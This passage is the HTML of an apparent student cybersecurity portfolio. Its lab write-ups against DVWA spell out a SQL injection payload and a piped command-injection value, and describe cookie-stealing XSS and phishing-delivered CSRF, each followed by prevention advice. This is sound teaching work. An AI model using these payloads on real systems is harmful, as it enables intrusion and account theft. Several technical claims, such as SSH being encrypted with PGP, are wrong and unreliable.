          <input class="form-control" id="email" type="email" placeholder="Your Email *" required="required" data-validation-required-message="Please enter your email address.">
          <p class="help-block text-danger"></p>
          </div>
          <div class="form-group">
          <input class="form-control" id="phone" type="tel" placeholder="Your Phone *" required="required" data-validation-required-message="Please enter your phone number.">
          <p class="help-block text-danger"></p>
          </div>
          </div>
          <div class="col-md-6">
          <div class="form-group">
          <textarea class="form-control" id="message" placeholder="Your Message *" required="required" data-validation-required-message="Please enter a message."></textarea>
          <p class="help-block text-danger"></p>
          </div>
          </div>
          <div class="clearfix"></div>
          <div class="col-lg-12 text-center">
          <div id="success"></div>
          <button id="sendMessageButton" class="btn btn-primary btn-xl text-uppercase" type="submit">Send Message</button>
          </div>
          </div>
          </form>
          </div>
          </div>
          </div>
          </section>
          
          <footer>
          <div class="container">
          <div class="row">
          <div class="col-md-4">
          <span class="copyright">Copyright &copy; Beekmans.dev 2019</span>
          </div>
          <div class="col-md-4">
          
          </div>
          <div class="col-md-4">
          <ul class="list-inline quicklinks">
          <li class="list-inline-item">
          <a href="#">Privacy Policy</a>
          </li>
          <li class="list-inline-item">
          <a href="#">Terms of Use</a>
          </li>
          </ul>
          </div>
          </div>
          </div>
          </footer>
          
          
          <div class="portfolio-modal modal fade" id="portfolioModal1" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Self Assessment</h2>
          <p class="item-intro text-muted">Week 1</p>
          <p>
          <ol>
          <li>What did you like / or find easy?</li>
          <li>What did you find difficult? At what point did it get too difficult for now?</li>
          <li>
          Then check the list of learning subjects for the basic knowledge assignment and
          possibilities and requirements for the project.
          <ul>
          <li>What subjects do you already know and what is unknown terrain for you?</li>
          </ul>
          </li>
          <li>What parts of the current semester would you like to give much attention?</li>
          <li>What do you want to achieve and learn in particular?</li>
          <li>Which study style and corresponding planning is most suitable for you?</li>
          <li>What would you like to do or achieve in the project? (subjects, type of project,
          domain to work in, learning goals, etc.)
          </li>
          </ol>
          <br>
          Answers:
          <br>
          <ol>
          <li>I like working with servers and playing with my network at home and virtual
          machines. I think I find basic networking the easiest.
          </li>
          <li>Advanced networking all knowledge that I know is self-taught so I think there is a
          lot I don’t know yet. I got stuck on virtual lans and ip routing at home what else
          I’ll find difficult is what I need to find out in the distant future.
          </li>
          <li>
          Subjects:
          <div class="container">
          <div class="row">
          <div class="col-sm-4">
          <ul>
          Used:
          <li>VMWare</li>
          <li>Linux</li>
          <li>IPv4</li>
          <li>NAT</li>
          <li>TCP/IP</li>
          <li>DNS</li>
          <li>HTTP</li>
          <li>FTP</li>
          <li>Firewalls</li>
          <li>HTTPS</li>
          <li>VPN</li>
          </ul>
          </div>
          <div class="col-sm-4">
          <ul>
          Know about but never used:
          <li>VMWare ESX</li>
          <li>Wireshark</li>
          <li>ARP</li>
          <li>IP routing</li>
          <li>SMTP</li>
          <li>IDS</li>
          </ul>
          </div>
          <div class="col-sm-4">
          <ul>
          Never heard about it:
          <li>Seclab</li>
          <li>ICMP ping</li>
          <li>CIA and IT Risk analysis</li>
          </ul>
          </div>
          </div>
          </div>
          </li>
          <li>Advanced networking and the transition to Java.</li>
          <li>How to be a good Cyber security expert.</li>
          <li>Style 2, I’ll try to find out if this is the most suitable for me and maybe go to
          the style 3 courses on the days I get subjects I already know.
          </li>
          <li>I don’t really have a preference I want to learn as much as possible related to
          cyber security.
          </li>
          </ol>
          </p>
          <ul class="list-inline">
          <li>Date: February 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Self assessment</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
           </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal2" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">Network diagram</p>
          <img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/NetworkDiagram.png" alt="">
          <p>This network diagram shows 3 main VLAN's containing a employee environment for the
          employees to work on, a guest environment for the people visiting the company as guests
          and a DMZ for the servers and services to the outside world.</p>
          <ul class="list-inline">
          <li>Date: February 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Documentation</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal3" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">Network diagram V2</p>
          <img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/NetworkDiagramV2.png" alt="">
          <p>This is the second version of my network diagram. I changed a few things to match
          Casper's feedback. The first thing I changed are the firewalls, I only needed to address
          the physical firewall and not the ones for every single interface. The last thing was I
          added the corresponding IP ranges and subnets to each VLAN.</p>
          <ul class="list-inline">
          <li>Date: March 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Documentation</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal4" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">Secure connections</p>
          <a href="../../img/portfolio/blue/sshAccess.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/sshAccess.png" alt=""></a>
          <p>Here you can see that I made a SSH connection to my Ubuntu webserver. I use Putty as my
          SSH terminal. SSH is encrypted using PGP (Pretty good privacy) which uses a public and a
          private key to communicate with each other. This is especially helpful because you don't
          need to transfer passwords to encrypt the connection. The sending client encrypts its
          message using the public key from the recipient and the recipient decrypts the message
          using its own private key. This works the same the other way around. I can use this
          technique to remotely manage my webservers without the need physical access.</p>
          <a href="../../img/portfolio/blue/vpnAccess.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/vpnAccess.png" alt=""></a>
          <p>Here you can see that I'm connected to a VPN. This VPN is OpenVPN and runs on the PfSense
          router. It gives me access to the subnets I gave it access to and with this I can
          remotely manage my whole network, with being actually physically connected to the
          network. The OpenVPN connection is encrypted be TLS (Transfer layer security) which is
          successor from SSL. TLS uses a handshake at the start of the connection where a key is
          shared between the 2 clients. This key will be used for the symmetric encryption of the
          messages. The authenticity of the connection is secured by a certificate and the public
          key of the webserver this prevents possible man in the middle attacks, where someone
          will pretend to be another website for example.</p>
          <a href="../../img/portfolio/blue/sslConnection.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/sslConnection.png" alt=""></a>
          <p>Here you can see the ssl certificate I created for the website that is running my
          portfolio. I created the script using certbot in Ubuntu and the CA is Let's encrypt
          authority x3. The website automatically forces all traffic to https, the website is
          still accessible by http but will redirect the user to https.</p>
          <ul class="list-inline">
          <li>Date: March 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Secure connections</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal5" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">IDS/IPS</p>
          <P>I implemented Suricata as my IPS, I thought it would be the best option because they say
          it's more advanced and newer. Below you can see some prove of the implementation and
          some results I came across.</P>
          <a href="../../img/portfolio/blue/Suricata1.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/Suricata1.png" alt=""></a>
          <p>I configured the IPS to monitor the WAN and LAN interface for now but I'm planning to
          configure it to the Employee VLAN as well. This will protect the company for any
          potential threats from the inside.</p>
          <a href="../../img/portfolio/blue/Suricata2.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/Suricata2.png" alt=""></a>
          <p>I tested the IPS with a website called <a href="https://www.wicar.org/">Wicar</a>. On
          this website you can run malicious code and test you network without it being an actual
          threat or risk.</p>
          <a href="../../img/portfolio/blue/Suricata3.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/Suricata3.png" alt=""></a>
          <p>I have used the Snort community rules and the Emerging threats rules these are both free
          to use and do a decent job of protecting the network with not too many false
          positives.</p>
          <a href="../../img/portfolio/blue/DDOSAlert.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/DDOSAlert.png" alt=""></a>
          <p>We encountered a real world scenario which actually turned out to work really well with
          an IPS. Bram tried to DDOS my website while it was running in my pfsense environment.
          The IPS immediately noticed this and blocked his IP. While the website was running
          outside the pfsense zone Bram could DDOS all he want without getting blocked.</p>
          <a href="../../img/portfolio/blue/BlockList.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/BlockList.png" alt=""></a>
          <p>Here you can see Bram's IP in the Suricata blocklist.</p>
          <a href="../../img/portfolio/blue/Bram'sIP.jpg"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/Bram'sIP.jpg" alt=""></a>
          <p>This is a screenshot from Bram's computer with his IP he used for generating the
          alert.</p>
          <ul class="list-inline">
          <li>Date: April 2019</li>
          <li>Client: Fontys</li>
          <li>Category: IDS/IPS</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal6" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
           <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">Information Security and Risk Analysis</p>
          <h3>CIA</h3>
          <h4>Confidentiality:</h4>
          <p>The company will hold confidential data from costumers, things like credit card
          information user accounts and databases for the costumer's websites.</p>
          <br>
          <ul>
          <li>Attribute .... Threat</li>
          <li>Costumer data .... Leak</li>
          </ul>
          <h4>Integrity:</h4>
          <p>The costumers trust the company to secure their servers on their end and they trust the
          company that it won't sell any costumer data to 3rd parties.</p>
          <br>
          <ul>
          <li>Attribute .... Threat</li>
          <li>Correct .... Tampering</li>
          </ul>
          <h4>Availability:</h4>
          <p>Because the costumers might use these websites for commercial use, it is at the utmost
          importance that the websites are fast, reliable and 24/7 reachable.</p>
          <br>
          <ul>
          <li>Attribute .... Threat</li>
          <li>Well timed .... Delay</li>
          <li>Continuity .... Downtime</li>
          </ul>
          <p>Click on this <a href="../../img/portfolio/Risk%20analysis.xlsx">link</a> to download the full
          risk analysis.</p>
          <ul class="list-inline">
          <li>Date: April 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Risk Analysis</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal7" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">IT Monitoring</p>
          <p>I implemented a Nagios server and installed Ntop as part of my network monitoring
          system.</p>
          <a href="../../img/portfolio/blue/OnlineHosts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/OnlineHosts.png" alt=""></a>
          <p>Ntop generates a list with all hosts that are online on the network and you can filter
          them by VLAN. You can see how much bandwidth they are using how much data was
          transferred since they are online and how many flows are going to that host.</p>
          <a href="../../img/portfolio/blue/MostUsedHosts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/MostUsedHosts.png" alt=""></a>
          <p>Here I can see which host uses the most traffic in my DMZ. With 172.16.0.2 being the
          apache server and 172.16.0.3 being the IIS server.</p>
          <a href="../../img/portfolio/blue/MostUsedProtocols.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/MostUsedProtocols.png" alt=""></a>
          <p>Here I can see which protocols are used the most. Windows update on number 1 because it
          needs to download a lot and after that ssl for the https traffic to my website and ftp
          to push changes. This doesn't indicate that the most traffic is going to windows update
          only that it used the most bandwidth.</p>
          <a href="../../img/portfolio/blue/BulgarianHacker.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/BulgarianHacker.png" alt=""></a>
          <p>Ntop even managed to identify a rogue Bulgarian hacker trying to access my Jenkins
          server.</p>
          <a href="../../img/portfolio/blue/HostsStatus.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/HostsStatus.png" alt=""></a>
          <p>This is Nagios it is in some ways similar to Ntop but is much more advanced and can do
          some things that Ntop can't. On this page you can see al the hosts that are monitored by
          Nagios. It displays if the hosts are up and running or if there are any problems.</p>
          <a href="../../img/portfolio/blue/HostDetails.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/HostDetails.png" alt=""></a>
          <p>If you click on one of the monitored hosts from the previous picture Nagios will show you
          with a more detailed report on the host with some more information about uptime and
          status.</p>
          <a href="../../img/portfolio/blue/ServiceStatus.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/ServiceStatus.png" alt=""></a>
          <p>This is a great example on something Nagios is much better at then Ntop. Here Nagios
          monitors all the services you flagged on different hosts. For example your apache server
          could be down but the physical Linux server is still up and running. Nagios and Ntop
          will both say this Linux machine is up and fine but Nagios will also say that the
          http/https service is down. The same goes for every other service you configure to
          monitor (SSH/FTP).</p>
          <ul class="list-inline">
          <li>Date: April 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Monitoring</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal8" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">SQL injection</p>
          <a href="../../img/portfolio/red/SqlStart.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/SqlStart.png" alt=""></a>
          <p>I applied sql injection on a search function in DVWA.</p>
          <a href="../../img/portfolio/red/CheckIfVuln.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CheckIfVuln.png" alt=""></a>
          <p>The easiest way to check if the search function is vulnerable is to just type some
          gibberish that the search function doesn't expect. This should generate a sql error.</p>
          <a href="../../img/portfolio/red/CheckIfVulnResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CheckIfVulnResult.png" alt=""></a>
          <p>And it did! Now we know that the search function is vulnerable and we can try some
          injections</p>
          <p>So know we can check which database we're dealing with by getting the version.</p>
          <a href="../../img/portfolio/red/GetDbVersion.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/GetDbVersion.png" alt=""></a>
          <p>Oke let's break it down.</p>
          <p>The query that is used for searching the users probably looks like something like this
          "SELECT first_name, last_name FROM users WHERE user_id = '$id'" and I typed "null' UNION
          select CURRENT_user, @@version #"</p>
          <p>The "null'" ends the original query and makes it obsolete because there probably aren't
           any users with a 'null' as id. The 'UNION' allows me to execute a subquery and the
          result from this query gets added underneath the results from the original query.</p>
          <p>Now I use 'select' to indicate which information I want to get. I used 'CURRENT_user' and
          '@@version' to get both the current user and the database version.</p>
          <p>The reason that I select both the "CURRENT_user" and the "@@version" in the same query,
          is that if I would only select for example "@@version" I would get the error displayed
          below. I could have fixed that by rewriting the query like this: "INSERT QUERY" and I
          typed "null' UNION select @@version, @@version #" This way the subquery matches the
          amount of columns of the original query again.</p>
          <a href="../../img/portfolio/Use%20Of%23.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/Use%20Of%23.png" alt=""></a>
          <p>TALK ABOUT THE #</p>
          <a href="../../img/portfolio/red/DiffNumberColumns.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/DiffNumberColumns.png" alt=""></a>
          <p>Now we can execute any query we want as long as it matches the amount of columns of the
          original query, otherwise we get a error like the one displayed above. Now we can try
          something that has a little more impact.</p>
          <a href="../../img/portfolio/red/GetAllTables.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/GetAllTables.png" alt=""></a>
          <p>For example by getting all the table names inside the database. This is obvious not a
          good sign because I good use this to determine what the names are of the user tables and
          check if there might be some more tables I want to focus on, for example credit card
          information of the users.</p>
          <a href="../../img/portfolio/red/GetUserAndPass.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/GetUserAndPass.png" alt=""></a>
          <p>But in this case we won't go after people's credit card information but after there
          password. I know the user table name from the previous query and now I can just try some
          common column names like; username, user, name, those type of things.</p>
          <p>And we got a username and a hash! But now what? The username is simple but the password
          is hashed and can't be just copied and used.</p>
          <a href="../../img/portfolio/red/HashDecrypt.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/HashDecrypt.png" alt=""></a>
          <p>That's were this site comes in. I just insert the md5 hash in this decryptor and it
          checks a big database with common hashes and their decrypted word. And now I have the
          password and I can just login with admin/password.</p>
          <p>So how would you prevent this? The best thing to do is sanitize the queries. Make sure
          all the queries use prepared statements and are parameterised. This prevents people
          inserting for example strings instead of numbers and prevents them from ignoring your
          query and inserting their own.</p>
          <ul class="list-inline">
          <li>Date: October 2019</li>
          <li>Client: Fontys</li>
          <li>Category: SQL injection</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal9" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Command injection</p>
          <p>I applied sql injection on a ping function in DVWA.</p>
          <a href="img/portfolio/Command%20injection.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/Command%20injection.png" alt=""></a>
          <p>The way this function works is it takes the ip and inserts it directly in a shell. It
          would probably looks like something like this "ping 'INSERTED_IP'".</p>
          <p>Now this little symbol "|" is called a pipe and it can be used to execute multiple
          commands in one line. So I used the "|" to execute my own command after the ping command
          just like shown above.</p>
          <p>I typed in the ip because it still needs to execute the ping command and after that I did
          a "ipconfig" so the command would look like this when executed in the shell: "ping
          185.230.127.234 | ipconfig" This gave us the ip information of the machine the webpage
          is running on.</p>
          <a href="../../img/portfolio/red/CmdCurrentUser.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CmdCurrentUser.png" alt=""></a>
          <p>I can also get the current user logged in user from the machine using "net user". But
          with "net user" you can do much more even change the password of the current user or
          create a completely new user just for me.</p>
          <a href="../../img/portfolio/red/CmdWifiPass.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CmdWifiPass.png" alt=""></a>
          <p>What is maybe even better I can get the wifi password of the connected pc in plain text.
          Now I can connect to the same network because I know the password.</p>
          <a href="../../img/portfolio/red/CmdEnterpriceWifi.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CmdEnterpriceWifi.png" alt=""></a>
          <p>This trick doesn't work with more advanced wifi security though. Here you see the eduroam
          network from school which is protected with 802.1x control. This doesn't mean you can't
          get the password at all it just makes it a whole lot harder.</p>
          <a href="../../img/portfolio/red/CIDIR.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CIDIR.png" alt=""></a>
          <p>I was also able to run the "dir" command. This tells me a lot about the local machine and
          how the web server is installed.</p>
          <a href="../../img/portfolio/red/CISystemInfo.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CISystemInfo.png" alt=""></a>
          <P>With the "systeminfo" command I'm able to get a lot of information about the physical
          machine which might be useful to me later. It greatly increases my attack surface.</P>
          <p>This can be prevented by sanitizing the input and not just inserting it straight into the
          shell. Make sure it goes to a parameterised function first, check the input and then
          insert it into a shell for example.</p>
          <ul class="list-inline">
          <li>Date: October 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Command injection</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal10" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Cross-site scripting</p>
          <p>I will now show you how you could apply XSS to a website.</p>
          <a href="../../img/portfolio/red/XSSAlert.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSAlert.png" alt=""></a>
          <p>First I have to check if the website is vulnerable. The easiest way to check this is just
          to try a simple "Alert" script just like this.</p>
          <a href="../../img/portfolio/red/XSSAlertResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSAlertResult.png" alt=""></a>
          <p>As you can see the script works so that means that the website is vulnerable to XSS. Now
          I can try something that has some more impact and could actually be useful for me.</p>
          <a href="../../img/portfolio/red/MaxCharLimit.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/MaxCharLimit.png" alt=""></a>
          <p>This form doesn't allow more than 50 characters, so writing bigger scripts might make
          this difficult. Luckily they only validate this in the frontend so I can just inspect
          this page and change the maximum characters in the form. So now I can write some bigger
          scripts that give me more information.</p>
          <a href="../../img/portfolio/red/XSSGetCookie.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSGetCookieResult.png" alt=""></a>
          <p>Like getting the cookie of the user so I can hijack their session.</p>
          <a href="../../img/portfolio/red/XSSGetCookieResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSGetCookieResult.png" alt=""></a>
          <p>So now I got the cookie it is my own though, but these scripts get stored inside the
          comments and the comments are persistent. Therefore I could also write a script that
          sends the cookie to me instead of displaying it. This way I can make it almost invisible
          for everyone to see and everyone who loads this page their cookie gets send to me.</p>
          <a href="../../img/portfolio/red/XSSOldCookie.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSOldCookie.png" alt=""></a>
          <p>Now I can try to use the cookie that I stole in the previous picture to try and login. As
          you can see my cookie is now different and I'm not logged in.</p>
          <a href="../../img/portfolio/red/XSSNewCookie.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSNewCookie.png" alt=""></a>
          <p>Now I placed the cookie I stole in my own cookie to hopefully make the website think I'm
           the person who is logged in that I stole this cookie from.</p>
          <a href="../../img/portfolio/red/XSSSessionHijack.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSSessionHijack.png" alt=""></a>
          <p>And now when I try to load the index page the website thinks I'm logged in as the person
          the cookie belongs to and I hijacked their session. I can now do everything on their
          account, comment in their name and change their data or steal their data.</p>
          <p>And if this person is by any chance an admin I might be able to do some more extreme
          things as well. Like creating or deleting users or their comments.</p>
          <a href="../../img/portfolio/red/XSSIframe.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSIframe.png" alt=""></a>
          <P>Sometimes the programmers try to prevent XSS by filtering out the script tags. But they
          forget the filter out all the other HTML tags. So I can load my own website in an
          "Iframe".</P>
          <a href="../../img/portfolio/red/XSSIframeResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSIframeResult.png" alt=""></a>
          <p>This might only sound as good free marketing but you can also do other things. Like
          redirecting everyone that visits this page to my own website or inject scripts in other
          html tags, so I can still run my scripts even though they banned the script tags.</p>
          <p>These type of attacks can be prevented by sanitizing the input much like SQL injection.
          Make sure that all the text that users can post to the website's frontend doesn't get
          converted to straight HTML. In this way they can't exploit other HTML tags as well.</p>
          <ul class="list-inline">
          <li>Date: October 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Cross-site scripting</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal11" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Cross-site request forgery</p>
           <p>Now I'm going to exploit CSRF on a website. The principles are quite simple, if you see
          the query that is called in the search bar, then the website might be vulnerable.</p>
          <a href="../../img/portfolio/red/CSRFLinkResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFLinkResult.png" alt=""></a>
          <p>As you can see in the search bar the website creates a query. If I would send this query
          without the form it would work as well but only for me. So I need to get this link to an
          user fill in my own password and make him click it.</p>
          <a href="../../img/portfolio/red/CSRFHTMLFile.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFHTMLFile.png" alt=""></a>
          <p>So I created a little phishing email using HTML. By using HTML I can make the email as
          legit as possible. By hiding the actual link in a text or even adding the DVWA logo. If
          I would know how they normally would send emails to their users, I could fully recreate
          it and you won't see the difference.</p>
          <a href="../../img/portfolio/red/CSRFUserEmail.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFUserEmail.png" alt=""></a>
          <p>The user would get an email like this and if you add urgency to the message, the user
          might not even think about any red flags because they feel the need to act as fast as
          possible.</p>
          <a href="../../img/portfolio/red/CSRFLinkResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFLinkResult.png" alt=""></a>
          <p>Now the user got send to the same page to change your password, but I already changed it
          when it loaded the page.</p>
          <a href="../../img/portfolio/red/CSRFLogin.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFLogin.png" alt=""></a>
          <p>Now if the user tries to login he can't because the password is changed, and I can log
          into his account and exploit it as much as I want.</p>
          <p>These type of attacks can be prevented by using things like a CAPTCHA or asking the user
          to fill in their old password. Even though this cannot fully prevent this type of attack
          it will make it a lot harder to succeed</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Cross-site request forgery</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
           </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal12" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Path traversal</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Path traversal</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal13" tabindex="-1" role="dialog" aria-hidden="true">
